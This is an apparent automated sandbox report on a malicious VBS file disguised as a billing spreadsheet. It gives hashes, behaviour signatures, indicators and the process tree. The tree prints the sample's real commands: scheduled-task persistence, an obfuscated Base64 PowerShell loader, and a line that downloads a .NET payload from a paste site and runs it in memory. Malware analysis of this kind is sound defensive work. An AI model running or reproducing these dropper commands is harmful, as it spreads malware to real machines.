Resubmissions

12/12/2023, 15:39

231212-s3zdzsfehm 10

12/12/2023, 15:32

231212-syk1ssfdgp 10

12/12/2023, 15:28

231212-swhgwshad3 10

Analysis

  • max time kernel
    125s
  • max time network
    52s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231130-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/12/2023, 15:32

General

  • Target

    Billed-report2023xls.vbs

  • Size

    135KB

  • MD5

    81df0d95d784fd74d88174859e7ab470

  • SHA1

    03aed26ac800ea6c492e64fb5fd5ab928b3564ee

  • SHA256

    da59502967c26be14e52f229feb80beb4672ad5454eb943969f1da9a21815886

  • SHA512

    4b76ec39584ab792f17dee8e435834ac50c3c9285fc30fee5a65b32ebf54fc3e918032caeb7f550f0d5d577faf45a8613ec040c6e318afcc0be1f7a47dbd4689

  • SSDEEP

    3072:8DupClYAAAA/AAAA4AAAA4AAAA4AAAA4AAAA4AAAAFsx7YX2ojcAAAA4AAAA4AA3:3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://textbin.net/raw/ezjmofz3s6

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4308
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /delete /tn mi /f
      2⤵
        PID:452
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /tn mi /tr "C:\Users\Admin\AppData\Local\Temp\mi.vbs" /sc minute /mo mi
        2⤵
        • Creates scheduled task(s)
        PID:4956
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $dgUdYL = 'J▒Bu▒Hg▒d▒Bv▒Ho▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒B3▒G0▒Z▒B0▒H▒▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HY▒ZQBi▒Gg▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwB0▒GU▒e▒B0▒GI▒aQBu▒C4▒bgBl▒HQ▒LwBy▒GE▒dw▒v▒GU▒egBq▒G0▒bwBm▒Ho▒MwBz▒DY▒Jw▒p▒C▒▒KQ▒g▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dgBl▒GI▒a▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒TQBh▒HI▒YQBj▒GE▒aQBi▒G8▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒TQBz▒HE▒QgBJ▒GI▒WQ▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒w▒C8▒d▒BU▒FM▒VQBY▒C8▒Z▒▒v▒GU▒ZQ▒u▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Hc▒bQBk▒HQ▒c▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒bgB4▒HQ▒bwB6▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $dgUdYL.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs');powershell -command $KByHL;
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$nxtoz = '034';$wmdtp = 'C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs';[Byte[]] $nvebh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );[system.AppDomain]::CurrentDomain.Load($nvebh).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/tTSUX/d/ee.etsap//:sptth' , $wmdtp , '____________________________________________-------', $nxtoz, '1', 'Roda' ));"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:832

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            2f57fde6b33e89a63cf0dfdd6e60a351

            SHA1

            445bf1b07223a04f8a159581a3d37d630273010f

            SHA256

            3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

            SHA512

            42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B

            MD5

            d8b9a260789a22d72263ef3bb119108c

            SHA1

            376a9bd48726f422679f2cd65003442c0b6f6dd5

            SHA256

            d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

            SHA512

            550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4mrvfzbj.uzw.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/832-29-0x00007FF83F840000-0x00007FF840301000-memory.dmp

            Filesize

            10.8MB

          • memory/832-23-0x00007FF83F840000-0x00007FF840301000-memory.dmp

            Filesize

            10.8MB

          • memory/832-25-0x000001DBEC700000-0x000001DBEC710000-memory.dmp

            Filesize

            64KB

          • memory/832-24-0x000001DBEC700000-0x000001DBEC710000-memory.dmp

            Filesize

            64KB

          • memory/832-26-0x000001DBEC700000-0x000001DBEC710000-memory.dmp

            Filesize

            64KB

          • memory/4372-12-0x0000020D71F50000-0x0000020D71F60000-memory.dmp

            Filesize

            64KB

          • memory/4372-13-0x0000020D71F50000-0x0000020D71F60000-memory.dmp

            Filesize

            64KB

          • memory/4372-11-0x00007FF83F840000-0x00007FF840301000-memory.dmp

            Filesize

            10.8MB

          • memory/4372-6-0x0000020D74140000-0x0000020D74162000-memory.dmp

            Filesize

            136KB

          • memory/4372-33-0x00007FF83F840000-0x00007FF840301000-memory.dmp

            Filesize

            10.8MB